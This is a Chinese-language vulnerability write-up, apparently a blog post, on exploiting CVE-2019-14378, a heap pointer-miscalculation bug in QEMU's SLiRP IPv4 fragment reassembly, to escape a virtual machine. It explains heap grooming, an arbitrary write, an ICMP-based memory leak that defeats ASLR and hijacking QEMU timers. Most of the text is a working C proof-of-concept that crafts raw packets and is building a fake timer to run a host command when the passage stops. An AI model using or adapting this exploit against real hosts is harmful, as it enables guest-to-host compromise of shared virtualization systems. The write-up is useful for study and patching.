QEMU 虚拟机逃逸漏洞分析与利用(CVE-2019-14378)

 

这篇文章将描述我如何利用CVE-2019-14378漏洞成功完成虚拟机逃逸利用,当组装IPv4分段数据包时,会触发此漏洞。此漏洞是通过代码审计发现的。

漏洞分析

QEMU(quick emulator)是一款由Fabrice Bellard等人编写的免费的可执行硬件虚拟化开源托管虚拟机(VMM)。

QEMU是一个托管的虚拟机镜像,它通过动态的二进制转换,模拟CPU,并且提供一组设备模型,使它能够运行多种未修改的客户机OS,可以通过与KVM(kernel-based virtual machine开源加速器)一起使用进而接近本地速度运行虚拟机。

QEMU内部网络分为两部分:

  • 提供给客户的虚拟网络设备(例如,PCI网卡)。
  • 与模拟NIC交互的网络后端(例如,将数据包放入主机的网络)。

默认情况下,QEMU将为guest虚拟机创建SLiRP用户网络后端和适当的虚拟网络设备(例如e1000 PCI卡)

在SLiRP中的数据包重组中发现了该漏洞。

IP分片

IP分片是一种Internet协议(IP)操作,它将数据包分成更小的片段,以便生成的片段可以通过具有比原始数据包大小更小的最大传输单元(MTU)的链路。片段由接收主机重新组装。

 0                   1                   2                   3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Version|  IHL  |Type of Service|          Total Length         |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|         Identification        |Flags|      Fragment Offset    |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|  Time to Live |    Protocol   |         Header Checksum       |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                       Source Address                          |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                    Destination Address                        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                    Options                    |    Padding    |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

flag

3位

  • 0:保留,必须为零
  • 1:(DF)0 =需要分片,1 =不分片。
  • 2:(MF)0 =最后一个片段,1 =还有更多片段。
  • 片偏移:13位
struct mbuf {
    /* header at beginning of each mbuf: */
    struct mbuf *m_next; /* Linked list of mbufs */
    struct mbuf *m_prev;
    struct mbuf *m_nextpkt; /* Next packet in queue/record */
    struct mbuf *m_prevpkt; /* Flags aren't used in the output queue */
    int m_flags; /* Misc flags */

    int m_size; /* Size of mbuf, from m_dat or m_ext */
    struct socket *m_so;

    char *m_data; /* Current location of data */
    int m_len; /* Amount of data in this mbuf, from m_data */

    ...

    char *m_ext;
    /* start of dynamic buffer area, must be last element */
    char m_dat[];
};

mbuf结构用于存储接收的IP层信息。有两个缓冲区m_dat位于结构内部,m_ext如果不足以存储数据包,则在堆上分配。

对于NAT转换,如果传入的数据包是分段的,则应在编辑和重新传输之前重新组装它们。该重组由ip_reass(Slirp *slirp, struct ip *ip, struct ipq *fp)函数完成。ip包含当前IP分组数据,fp是包含分段分组的链路列表。

ip_reass执行以下操作:
1.如果第一个片段到达(fp == NULL),则创建重组队列并插入ip此队列。
2.检查片段是否与先前收到的片段重叠,然后丢弃它。
3.如果收到所有分段的数据包,则重新组装它。通过修改第一个数据包的头部为新的ip数据包创建头部;

/*
 * Take incoming datagram fragment and try to
 * reassemble it into whole datagram.  If a chain for
 * reassembly of this datagram already exists, then it
 * is given as fp; otherwise have to make a chain.
 */
static struct ip *ip_reass(Slirp *slirp, struct ip *ip, struct ipq *fp)
{

    ...
    ...

    /*
     * Reassembly is complete; concatenate fragments.
     */
    q = fp->frag_link.next;
    m = dtom(slirp, q);

    q = (struct ipasfrag *)q->ipf_next;
    while (q != (struct ipasfrag *)&fp->frag_link) {
        struct mbuf *t = dtom(slirp, q);
        q = (struct ipasfrag *)q->ipf_next;
        m_cat(m, t);
    }

    /*
     * Create header for new ip packet by
     * modifying header of first packet;
     * dequeue and discard fragment reassembly header.
     * Make header visible.
     */
    q = fp->frag_link.next;

    /*
     * If the fragments concatenated to an mbuf that's
     * bigger than the total size of the fragment, then and
     * m_ext buffer was alloced. But fp->ipq_next points to
     * the old buffer (in the mbuf), so we must point ip
     * into the new buffer.
     */
    if (m->m_flags & M_EXT) {
        int delta = (char *)q - m->m_dat;
        q = (struct ipasfrag *)(m->m_ext + delta);
    }

漏洞发生在计算变量delta的时候。该代码假定第一个分段数据包不会在外部缓冲区(m_ext)中分配。q - m->dat当分组数据在mbuf->m_dat内部时,计算有效(q是包含片段和分组数据的链接列表的结构)。否则,如果m_ext分配了缓冲区,则q将在外部缓冲区内,并且计算delta将是错误的。

slirp/src/ip_input.c:ip_reass
    ip = fragtoip(q);
    ip->ip_len = next;
    ip->ip_tos &= ~1;
    ip->ip_src = fp->ipq_src;
    ip->ip_dst = fp->ipq_dst;

之后,新计算的指针q将转换为ip结构并修改此值。由于增量的错误计算,ip将指向不正确的位置,ip_srcip_dst可用于将受控数据写入计算的位置。如果计算出的ip位于未拼接区域,这也可能会使qemu崩溃。

 

漏洞利用

需要做的事情:

  • 1.要控制程序,我们需要编写相对于m-> m_ext的受控数据,为此需要精确控制堆。
  • 2.需要内存泄漏才能绕过ASLR
  • 3.堆上没有有用的函数指针来获取代码,所以必须可以任意写。

控制堆内存

让我们看一下如何在slirp中分配堆对象。

// How much room is in the mbuf, from m_data to the end of the mbuf
#define M_ROOM(m)                                                        
    ((m->m_flags & M_EXT) ? (((m)->m_ext + (m)->m_size) - (m)->m_data) : 
                            (((m)->m_dat + (m)->m_size) - (m)->m_data))
// How much free room there is
#define M_FREEROOM(m) (M_ROOM(m) - (m)->m_len)

slirp/src/slirp.c:slirp_input

      m = m_get(slirp); // m_get return mbuf object, internally calls g_malloc(0x668)
      ...
      /* Note: we add 2 to align the IP header on 4 bytes,
       * and add the margin for the tcpiphdr overhead  */
      if (M_FREEROOM(m) < pkt_len + TCPIPHDR_DELTA + 2) { // TCPIPHDR_DELTA + 2 = 
          m_inc(m, pkt_len + TCPIPHDR_DELTA + 2); // allocates new m_ext buffer since m_dat is insufficiant
      }
      ...

      if (proto == ETH_P_IP) {
          ip_input(m);

m_getm_freem_incm_cat是处理动态内存分配的数据包。当新数据包到达时,分配新的mbuf对象,并且如果m_dat足以存储分组数据就使用它,否则分配新的外部缓冲区m_inc并将数据复制到其上。

slirp/src/ip_input.c:ip_input
    /*
        * If datagram marked as having more fragments
        * or if this is not the first fragment,
        * attempt reassembly; if it succeeds, proceed.
        */
    if (ip->ip_tos & 1 || ip->ip_off) {
        ip = ip_reass(slirp, ip, fp);
        if (ip == NULL)
            return;

slirp/src/ip_input.c:ip_reass
    /*
     * If first fragment to arrive, create a reassembly queue.
     */
    if (fp == NULL) {
        struct mbuf *t = m_get(slirp);
        ...

如果传入数据包是分段的,mbuf则使用新对象存储数据包(fp),直到所有片段到达为止。当下一部分到达时,他们将被列入此列表。

这为我们提供了一个很好的原语来在堆大小上分配受控块(> 0x608)。对于每个数据包,将分配mbuf(0x670),如果它是第一个片段,则将分配另一个mbuf(fp:fragment queue)。

malloc(0x670)
if(pkt_len + TCPIPHDR_DELTA + 2 > 0x608)
   malloc(pkt_len + TCPIPHDR_DELTA + 2)
if(ip->ip_off & IP_MF)
   malloc(0x670)

我们可以使用它来做堆喷,以便后续分配将从顶部块中获取,这为我们提供了可预测的堆状态。

在堆上得到一个任意地址写

现在我们可以控制堆了。让我们看看如何使用这个漏洞点覆盖有用的东西。

    q = fp->frag_link.next; // Points to first fragment
    if (m->m_flags & M_EXT) {
        int delta = (char *)q - m->m_dat;
        q = (struct ipasfrag *)(m->m_ext + delta);
    }

假设这个堆状态是这样

            +------------+
            |     q      |
            +------------+
            |            |
            |            |
            |  padding   |
            |            |
            |            |
            +------------+
            |   m->m_dat |
            +------------+

现在先添加paddingm->m_ext之后我们可以写入该偏移量。因此控制这个填充块就能够控制delta。

当所有片段到达时,它们被连接到一个mbuf具有m_cat函数的对象。

slirp/src/muf.c
void m_cat(struct mbuf *m, struct mbuf *n)
{
    /*
     * If there's no room, realloc
     */
    if (M_FREEROOM(m) < n->m_len)
        m_inc(m, m->m_len + n->m_len);

    memcpy(m->m_data + m->m_len, n->m_data, n->m_len);
    m->m_len += n->m_len;

    m_free(n);
}


slirp/src/muf.c
void m_inc(struct mbuf *m, int size)
{
    ...
    if (m->m_flags & M_EXT) {
        gapsize = m->m_data - m->m_ext;
        m->m_ext = g_realloc(m->m_ext, size + gapsize);
    ...
}

如果m_inc调用realloc函数realloc函数可以容纳所请求的大小,则返回相同的块。因此,即使在重新组装数据包之后,我们也可以得到第一个数据包的m-> m_ext缓冲区。m_ext将被分配给第一个片段包,q将指向这个缓冲区。

            +------------+
            |  target    |
            +------------+
            |            |
            |            |
            |  padding   |
            |            |
            |            |
m-m_ext  -> +------------+  // q = m->m_ext + -padding  will point to target
            |     q      |  // delta = -paddig 
            +------------+
            |            |
            |            |
            |  padding   |
            |            |
            |            |
            +------------+
            |   m->m_dat |
            +------------+

所以指针计算后q会指向target

slirp/src/ip_input.c:ip_reass
    ip = fragtoip(q);
    ...
    ip->ip_src = fp->ipq_src;
    ip->ip_dst = fp->ipq_dst;

因为我们控制fp->ipq_srcfp->ipq_dst它是数据包的源和目的IP,我们就可以覆盖目标地址的内容。

任意地址写

我的初始目标是覆盖该m_data字段,以便我们可以使用数据包重组m_cat()来获得任意写入,但由于某些对齐和偏移问题,好像无法利用。

slirp/src/muf.c:m_cat
    memcpy(m->m_data + m->m_len, n->m_data, n->m_len);

但是能够覆盖m_len对象的字段。由于没有检查m_cat函数,我们可以使用m_len任意写入m_data。所以现在就没有了对齐问题,我们使用它来覆盖m_data不同对象以获得任意写入。

  • 发送id 0xdead和MF位置为1的数据包
  • 发送id 0xcafe和MF位置为1的数据包
  • 触发漏洞以覆盖m_len,0xcafe以便m_data + m_len指向0xdeadm_data
  • 发送带有id 0xcafe且MF位置为0的数据包以触发重组并0xdead用目标地址覆盖m_data
  • 发送带有id 0xdead且MF位置为0的数据包,该数据包将该数据包的内容写入m_data。

内存泄露&绕过ASLR

我们需要内存泄漏来绕过ASLR和PIE。为此,我们需要一些方法将数据传回给guest。我们发现,有一个非常常见的服务与该描述完全匹配:ICMP回应请求。SLiRP网关响应ICMP回应请求,返回数据包的有效负载不变。

我们有一个任意写,但是我们写在哪里,因为内存泄漏在这一点上是未知的?

我们可以在堆上部分覆盖和写入数据。

内存泄漏:

  • 使用任意写入在堆上创建伪ICMP头
  • 发送MF位置为1的ICMP请求。
  • 部分覆盖m_data以指向堆上的假标志头
  • 将MF位发送0以结束ICMP请求。
  • 接收主机内存泄漏。

任意代码执行

QEMUTimers 提供了一种在经过一段时间间隔后调用给定例程回调的方法,将一个指针传递给例程。

struct QEMUTimer {
    int64_t expire_time;        /* in nanoseconds */
    QEMUTimerList *timer_list;
    QEMUTimerCB *cb;
    void *opaque;
    QEMUTimer *next;
    int scale;
};

struct QEMUTimerList {
    QEMUClock *clock;
    QemuMutex active_timers_lock;
    QEMUTimer *active_timers;
    QLIST_ENTRY(QEMUTimerList) list;
    QEMUTimerListNotifyCB *notify_cb;
    void *notify_opaque;
    QemuEvent timers_done_ev;
};

main_loop_tlg是bss中的一个数组,包含QEMUTimerList与不同计时器相关联的数组。这些包含QEMUTimer结构列表。qemu循环遍历这些以检查它们中是否已经过期,如果是,cb则使用参数调用函数opaque

RIP控制:

  • 创建假QEMUTimer
  • 创建假QEMUTImerList,其中包含我们的假QEMUTimer
  • 使用伪QEMUTimerList覆盖main_loop_tlg条目

 

漏洞演示

漏洞PoC代码如下:

#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <stdio.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <net/ethernet.h>
#include <arpa/inet.h>
#include <linux/icmp.h>
#include <linux/if_packet.h>
#include <sys/ioctl.h>
#include <net/if.h>
#include <time.h>


#define die(x) do {                             
    perror(x);                                  
    exit(EXIT_FAILURE);                         
  }while(0);

// * * * * * * * * * * * * * * *  Constans * * * * * * * * * * * * * * * * * *

#define SRC_ADDR "10.0.2.15"
#define DST_ADDR "10.0.2.2"

#define INTERFACE "ens3"

#define ETH_HDRLEN 14         // Ethernet header length
#define IP4_HDRLEN 20         // IPv4 header length
#define ICMP_HDRLEN 8         // ICMP header length for echo request, excludes data
#define MIN_MTU 12000

// * * * * * * * * * * * * * * * QEMU Symbol offset * * * * * * * * * * * * * * * * * *

#define SYSTEM_PLT 0x029b290
#define QEMU_CLOCK 0x10e8200
#define QEMU_TIMER_NOTIFY_CB 0x2f4bff
#define MAIN_LOOP_TLG 0x10e81e0
#define CPU_UPDATE_STATE 0x488190

// Some place in bss which is not used to craft fake stucts
#define FAKE_STRUCT 0xf43360

// * * * * * * * * * * * * * * * QEMU Structs * * * * * * * * * * * * * * * * * *

struct mbuf {
    struct    mbuf *m_next;        /* Linked list of mbufs */
    struct    mbuf *m_prev;
    struct    mbuf *m_nextpkt;    /* Next packet in queue/record */
    struct    mbuf *m_prevpkt;    /* Flags aren't used in the output queue */
    int    m_flags;        /* Misc flags */

    int    m_size;            /* Size of mbuf, from m_dat or m_ext */
    struct    socket *m_so;

    char * m_data;            /* Current location of data */
    int    m_len;            /* Amount of data in this mbuf, from m_data */

    void *slirp;
    char resolution_requested;
    u_int64_t expiration_date;
    char   *m_ext;
    /* start of dynamic buffer area, must be last element */
    char  *  m_dat;
};


struct QEMUTimer {
    int64_t expire_time;        /* in nanoseconds */
    void *timer_list;
    void *cb;
    void *opaque;
    void *next;
    int scale;
};


struct QEMUTimerList {
    void * clock;
    char active_timers_lock[0x38];
    struct QEMUTimer *active_timers;
    struct QEMUTimerList *le_next;   /* next element */                      
    struct QEMUTimerList **le_prev;  /* address of previous next element */  
    void *notify_cb;
    void *notify_opaque;

    /* lightweight method to mark the end of timerlist's running */
    size_t timers_done_ev;
};



// * * * * * * * * * * * * * * * Helpers * * * * * * * * * * * * * * * * * *

int raw_socket;
int recv_socket;
int spray_id;
int idx;
char mac[6];

void * code_leak;
void * heap_leak;

void *Malloc(size_t size) {
  void * ptr = calloc(size,1);
  if (!ptr) {
    die("malloc() failed to allocate");
  }
  return ptr;
}

unsigned short in_cksum(unsigned short *ptr,int nbytes) {

register long           sum;            /* assumes long == 32 bits */
    u_short oddbyte;
    register u_short answer; /* assumes u_short == 16 bits */

    /*
     * Our algorithm is simple, using a 32-bit accumulator (sum),
     * we add sequential 16-bit words to it, and at the end, fold back
     * all the carry bits from the top 16 bits into the lower 16 bits.
     */

    sum = 0;
    while (nbytes > 1) {
      sum += *ptr++;
      nbytes -= 2;
}

/* mop up an odd byte, if necessary */
if (nbytes == 1) {
oddbyte = 0;            /* make sure top half is zero */
*((u_char *) &oddbyte) = *(u_char *)ptr;   /* one byte only */
sum += oddbyte;
}

/*
 * Add back carry outs from top 16 bits to low 16 bits.
 */

sum  = (sum >> 16) + (sum & 0xffff);    /* add high-16 to low-16 */
sum += (sum >> 16);                     /* add carry */
answer = ~sum;          /* ones-complement, then truncate to 16 bits */
return(answer);
}

void hex_dump(char *desc, void *addr, int len) 
{
    int i;
    unsigned char buff[17];
    unsigned char *pc = (unsigned char*)addr;
    if (desc != NULL)
        printf ("%s:n", desc);
    for (i = 0; i < len; i++) {
        if ((i % 16) == 0) {
            if (i != 0)
                printf("  %sn", buff);
            printf("  %04x ", i);
        }
        printf(" %02x", pc[i]);
        if ((pc[i] < 0x20) || (pc[i] > 0x7e)) {
            buff[i % 16] = '.';
        } else {
            buff[i % 16] = pc[i];
        }
        buff[(i % 16) + 1] = '';
    }
    while ((i % 16) != 0) {
        printf("   ");
        i++;
    }
    printf("  %sn", buff);
}

char * ethernet_header(char * eth_hdr){

    /* src MAC :  52:54:00:12:34:56 */
    memcpy(&eth_hdr[6],mac,6);

    // Next is ethernet type code (ETH_P_IP for IPv4).
    // http://www.iana.org/assignments/ethernet-numbers
    eth_hdr[12] = ETH_P_IP / 256;
    eth_hdr[13] = ETH_P_IP % 256;
    return eth_hdr;
}

void ip_header(struct  iphdr * ip ,u_int32_t src_addr,u_int32_t dst_addr,u_int16_t payload_len,
                         u_int8_t protocol,u_int16_t id,uint16_t frag_off){

  /* rfc791 */
  ip->ihl = IP4_HDRLEN / sizeof (uint32_t);
  ip->version = 4;
  ip->tos = 0x0;
  ip->tot_len = htons(IP4_HDRLEN + payload_len);
  ip->id = htons(id);
  ip->ttl = 64;
  ip->frag_off = htons(frag_off);
  ip->protocol = protocol;
  ip->saddr = src_addr;
  ip->daddr = dst_addr;
  ip->check = in_cksum((unsigned short *)ip,IP4_HDRLEN);
}

void icmp_header(struct icmphdr *icmp, char *data, size_t size) {

  /* rfc792 */
  icmp->type = ICMP_ECHO;
  icmp->code = 0;
  icmp->un.echo.id = htons(0);
  icmp->un.echo.sequence = htons(0);
  if (data) {
    char * payload = (char * )icmp+ ICMP_HDRLEN;
    memcpy(payload, data, size);
  }

  icmp->checksum = in_cksum((unsigned short *)icmp, ICMP_HDRLEN + size);

}

void send_pkt(char *frame, u_int32_t frame_length) {

  struct sockaddr_ll sock;
  sock.sll_family = AF_PACKET;
  sock.sll_ifindex = idx;
  sock.sll_halen = 6;
  memcpy (sock.sll_addr, mac, 6 * sizeof (uint8_t));

  if(sendto(raw_socket,frame,frame_length,0x0,(struct sockaddr *)&sock,
            sizeof(sock))<0)
    die("sendto()");
}

void send_ip4(uint32_t id,u_int32_t size,char * data,u_int16_t frag_off) {

  u_int32_t src_addr, dst_addr;
  src_addr = inet_addr(SRC_ADDR);
  dst_addr = inet_addr(DST_ADDR);

  char * pkt = Malloc(IP_MAXPACKET);
  struct iphdr * ip = (struct iphdr * ) (pkt + ETH_HDRLEN);

  ethernet_header(pkt);
  u_int16_t payload_len = size;
  ip_header(ip,src_addr,dst_addr,payload_len,IPPROTO_ICMP,id,frag_off);

  if(data) {
    char * payload = (char *)pkt + ETH_HDRLEN + IP4_HDRLEN;
    memcpy(payload, data, payload_len);
  }

  u_int32_t frame_length = ETH_HDRLEN + IP4_HDRLEN + payload_len;
  send_pkt(pkt,frame_length);
  free(pkt);
}

void send_icmp(uint32_t id,u_int32_t size,char * data,u_int16_t frag_off) {

  char * pkt = Malloc(IP_MAXPACKET);
  struct icmphdr * icmp = (struct icmphdr * )(pkt);

  if(!data)
      data = Malloc(size);
  icmp_header(icmp,data,size);

  u_int32_t len =  ICMP_HDRLEN + size;
  send_ip4(id,len,pkt,frag_off);
  free(pkt);
 }

// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *

void initialize() {
   int sd;
   struct ifreq ifr;
   char interface[40];
   int mtu;

   srand(time(NULL));
   strcpy (interface, INTERFACE);

  // Submit request for a socket descriptor to look up interface.
  if ((sd = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
    die("socket() failed to get socket descriptor for using ioctl()");
  }
    // Use ioctl() to get interface maximum transmission unit (MTU).
  memset (&ifr, 0, sizeof (ifr));
  strcpy (ifr.ifr_name, interface);
  if (ioctl (sd, SIOCGIFMTU, &ifr) < 0) {
    die("ioctl() failed to get MTU ");
  }
  mtu = ifr.ifr_mtu;
  printf ("MTU of interface %s : %in", interface, mtu);
  if (mtu < MIN_MTU) {
    printf("Runn$ ip link set dev %s mtu 12000n",interface);
    die("");
  }

  // Use ioctl() to look up interface name and get its MAC address.
  memset (&ifr, 0, sizeof (ifr));
  snprintf (ifr.ifr_name, sizeof (ifr.ifr_name), "%s", interface);
  if (ioctl (sd, SIOCGIFHWADDR, &ifr) < 0) {
    die("ioctl() failed to get source MAC address ");
  }
  memcpy (mac, ifr.ifr_hwaddr.sa_data, 6 * sizeof (uint8_t));
  printf ("MAC %s :", interface);
  for (int i=0; i<5; i++) {
    printf ("%02x:", mac[i]);
  }
  printf ("%02xn", mac[5]);

  // Use ioctl() to look up interface index which we will use to
  // bind socket descriptor sd to specified interface with setsockopt() since
  // none of the other arguments of sendto() specify which interface to use.
  memset (&ifr, 0, sizeof (ifr));
  snprintf (ifr.ifr_name, sizeof (ifr.ifr_name), "%s", interface);
  if (ioctl (sd, SIOCGIFINDEX, &ifr) < 0) {
    die("ioctl() failed to find interface ");
  }

  close (sd);
  printf ("Index for interface %s : %in", interface, ifr.ifr_ifindex);
  idx = ifr.ifr_ifindex;

  if((raw_socket = socket(PF_PACKET, SOCK_RAW, htons (ETH_P_ALL)))==-1)
      die("socket() failed to obtain raw socket");


  /* Bind socket to interface index. */
  if (setsockopt (raw_socket, SOL_SOCKET, SO_BINDTODEVICE, &ifr, sizeof (ifr)) < 0) {
    die("setsockopt() failed to bind to interface ");
  }

  printf("Initialized socket discriptorsn");
}


void spray(uint32_t size, u_int32_t count) {
  printf("Spraying 0x%x x ICMP[0x%x]n",count,size);
   int s;
   u_int16_t frag_off;
   char * data;

   for (int i = 0; i < count; i++) {
     send_icmp(spray_id + i,size, NULL, IP_MF);
   }
}

void arbitrary_write(void *addr, size_t addrlen, char *payload, size_t size,
                     size_t spray_count) {

    spray(0x8, spray_count);


    size_t id = spray_id + spray_count;
    // Target
    size_t target_id = id++;
    send_ip4(target_id, 0x8, NULL, IP_MF);


    // Padding
    send_ip4(id++, 0x8, NULL, IP_MF);
    send_ip4(id++, 0x8, NULL, IP_MF);

    // Piviot Point
    size_t hole_1 = id++;
    send_ip4(hole_1, 0x8, NULL, IP_MF);


    // Padding
    send_ip4(id++, 0xC30, NULL, IP_MF);

    // For creating hole
    size_t hole_2 = id++;
    send_ip4(hole_2, 0x8, NULL, IP_MF);

    // To  prevent consolidation
    send_ip4(id++, 0x8, NULL, IP_MF);

    // This should create the fist hole
    send_ip4(hole_1, 0x8, NULL, 0x1);

    // This should create the second hole
    send_ip4(hole_2, 0x8, NULL, 0x1);

    int m_data_off = -0x70;
    int m_len = m_data_off;
    addr = (void *)((size_t)addr + ((m_len * -1) - addrlen));
    if (addrlen != 0x8) {
      m_len -= (0x8 - addrlen);
    }

    size_t vuln_id = id++;

    char * pkt = Malloc(IP_MAXPACKET);
    memset(pkt,0x0,IP_MAXPACKET);
    struct iphdr * ip = (struct iphdr * ) (pkt + ETH_HDRLEN);
    ethernet_header(pkt);

    u_int16_t pkt_len = 0xc90;
    ip_header(ip,m_len,0x0,pkt_len,IPPROTO_ICMP,vuln_id,IP_MF);
    u_int32_t frame_length = ETH_HDRLEN + IP4_HDRLEN + pkt_len;

    // The mbuf of this packet will be placed in the second hole and
    // m_ext buff will be placed on the first hole, We will write wrt
    // to this.
    send_pkt(pkt,frame_length);

    memset(pkt,0x0,IP_MAXPACKET);
    ip = (struct iphdr * ) (pkt + ETH_HDRLEN);
    ethernet_header(pkt);
    pkt_len = 0x8;
    ip_header(ip,m_len,0x0,pkt_len,IPPROTO_ICMP,vuln_id,0x192);
    frame_length = ETH_HDRLEN + IP4_HDRLEN + pkt_len;

    // Trigger the bug to change target's m_len
    send_pkt(pkt,frame_length);


    // Underflow and write, to change m_data
    char addr_buf[0x8] = {0};
    if (addrlen != 0x8) {
      memcpy(&addr_buf[(0x8-addrlen)],(char *)&addr,addrlen);
    } else {
      memcpy(addr_buf,(char *)&addr,8);
    }
    send_ip4(target_id, 0x8, addr_buf, 0x1|IP_MF);
    send_ip4(target_id, size, payload, 0x2);

    hex_dump("Writing Payload ", payload, size);
}


void recv_leaks(){
  /* Prepare recv sd */
  /* Submit request for a raw socket descriptor to receive packets. */
  int recvsd, fromlen, bytes, status;
  struct sockaddr from;
  char recv_ether_frame[IP_MAXPACKET];
  struct iphdr *recv_iphdr = (struct iphdr *)(recv_ether_frame + ETH_HDRLEN);
  struct icmphdr *recv_icmphdr =
      (struct icmphdr *)(recv_ether_frame + ETH_HDRLEN + IP4_HDRLEN);

  for (;;) {

    memset(recv_ether_frame, 0, IP_MAXPACKET * sizeof(uint8_t));
    memset(&from, 0, sizeof(from));
    fromlen = sizeof(from);
    if ((bytes = recvfrom(recv_socket, recv_ether_frame, IP_MAXPACKET, 0,
                          (struct sockaddr *)&from, (socklen_t *)&fromlen)) <
        0) {
      status = errno;
      // Deal with error conditions first.
      if (status == EAGAIN) { // EAGAIN = 11
        printf("Time outn");
      } else if (status == EINTR) { // EINTR = 4
        continue; // Something weird happened, but let's keep listening.
      } else {
        perror("recvfrom() failed ");
        exit(EXIT_FAILURE);
      }
    } // End of error handling conditionals.

    // Check for an IP ethernet frame, carrying ICMP echo reply. If not, ignore
    // and keep listening.
    if ((((recv_ether_frame[12] << 8) + recv_ether_frame[13]) == ETH_P_IP) &&
        (recv_iphdr->protocol == IPPROTO_ICMP) &&
        (recv_icmphdr->type == ICMP_ECHOREPLY) && (recv_icmphdr->code == 0) &&
        (recv_icmphdr->checksum == 0xffff)) {
      hex_dump("Recieved ICMP Replay : ", recv_ether_frame, bytes);

      code_leak = (void *)(*((size_t *)&recv_ether_frame[0x40]) - CPU_UPDATE_STATE);
      size_t *ptr = (size_t *)(recv_ether_frame + 0x30);
      for (int i = 0; i < (bytes / 0x8); i++) {
        if ((ptr[i] & 0x7f0000000000) == 0x7f0000000000) {
          heap_leak = (void *)(ptr[i] & 0xffffff000000);
          break;
        }
      }

      printf("Host Code Leak : %pn", code_leak);
      printf("Host Heap Leak : %pn", heap_leak);
      break;
    }
  }
}

void leak() {
    u_int32_t src_addr, dst_addr;
    src_addr = inet_addr(SRC_ADDR);
    dst_addr = inet_addr(DST_ADDR);

    /* Crafting Fake ICMP Packet For Leak */
    char * pkt = Malloc(IP_MAXPACKET);
    struct iphdr * ip = (struct iphdr * ) (pkt + ETH_HDRLEN);
    struct icmphdr * icmp = (struct icmphdr * )(pkt+ETH_HDRLEN+IP4_HDRLEN);
    ethernet_header(pkt);
    ip_header(ip,src_addr,dst_addr,ICMP_HDRLEN,IPPROTO_ICMP,0xbabe,IP_MF);

    ip->tot_len = ntohs(ip->tot_len) - IP4_HDRLEN;
    ip->id = ntohs(ip->id);
    ip->frag_off = htons(ip->frag_off);

    icmp_header(icmp,NULL,0x0);
    char * data = (char *)icmp + ICMP_HDRLEN + 8;
    size_t pkt_len = ETH_HDRLEN + IP4_HDRLEN + ICMP_HDRLEN;

    spray_id = rand() & 0xffff;
    arbitrary_write((void * )(0xb00-0x20),3,pkt,pkt_len+4,0x100);

    // This is same as the arbitrary write function
    spray_id = rand() & 0xffff;
    spray(0x8, 0x20);
    size_t id = spray_id + 0x20;

    size_t replay_id = id++;
    send_ip4(replay_id, 0x100, NULL, IP_MF);

    // Target
    size_t target_id = id++;
    send_ip4(target_id, 0x8, NULL, IP_MF);


    // Padding
    send_ip4(id++, 0x8, NULL, IP_MF);
    send_ip4(id++, 0x8, NULL, IP_MF);

    // Piviot Point
    size_t hole_1 = id++;
    send_ip4(hole_1, 0x8, NULL, IP_MF);


    // Padding
    send_ip4(id++, 0xC30, NULL, IP_MF);

    // For creating hole
    size_t hole_2 = id++;
    send_ip4(hole_2, 0x8, NULL, IP_MF);

    // Prevent Consolidation
    send_ip4(id++, 0x8, NULL, IP_MF);

    // This should create the fist hole
    send_ip4(hole_1, 0x8, NULL, 0x1);

    // This should create the second hole
    send_ip4(hole_2, 0x8, NULL, 0x1);

    // Trigger the bug to change target's m_len
    int m_data_off = -0xd50;
    int m_len = m_data_off;
    size_t * addr = (size_t * )(0xb00 - 0x20 + ETH_HDRLEN + 0xe +  6) ;
    size_t addrlen = 0x3;

    if (addrlen != 0x8) {
      m_len -= (0x8 - addrlen);
    }

    size_t vuln_id = id++;

    memset(pkt,0x0,IP_MAXPACKET);
    ip = (struct iphdr * ) (pkt + ETH_HDRLEN);
    ethernet_header(pkt);

    pkt_len = 0xc90;
    ip_header(ip,m_len,0x0,pkt_len,IPPROTO_ICMP,vuln_id,IP_MF);
    u_int32_t frame_length = ETH_HDRLEN + IP4_HDRLEN + pkt_len;
    send_pkt(pkt,frame_length);


    memset(pkt,0x0,IP_MAXPACKET);
    ip = (struct iphdr * ) (pkt + ETH_HDRLEN);
    ethernet_header(pkt);
    pkt_len = 0x8;
    ip_header(ip,m_len,0x0,pkt_len,IPPROTO_ICMP,vuln_id,0x192);
    frame_length = ETH_HDRLEN + IP4_HDRLEN + pkt_len;
    send_pkt(pkt,frame_length);


    // Underflow and write to change m_data
    char addr_buf[0x8] = {0};
    if (addrlen != 0x8) {
      memcpy(&addr_buf[(0x8-addrlen)],(char *)&addr,addrlen);
    } else {
      memcpy(addr_buf,(char *)&addr,8);
    }
    send_ip4(target_id, 0x8, addr_buf, 0x1);

  if ((recv_socket = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) < 0)
      die("socket() failed to obtain a receive socket descriptor");
    send_ip4(replay_id, 0x8, NULL, 0x20);
    recv_leaks();


    char zero[0x28] = {0};
    spray_id = rand() & 0xffff;
    printf("Cleaning Heapn");
    arbitrary_write(heap_leak + (0xb00 - 0x20),3,zero,sizeof(zero),0x20);
}


void pwn() {
  char payload[0x200] = {0};
  struct QEMUTimerList *tl = (struct QEMUTimerList *)payload;
  struct QEMUTimer *ts =
      (struct QEMUTimer *)(payload + sizeof(struct QEMUTimerList));

  char cmd[] = "/usr/bin/gnome-calculator";
  memcpy((void *)(payload + sizeof(struct QEMUTimerList )   
                             +sizeof(struct QEMUTimer )),  
                  (void *)cmd,sizeof(cmd));

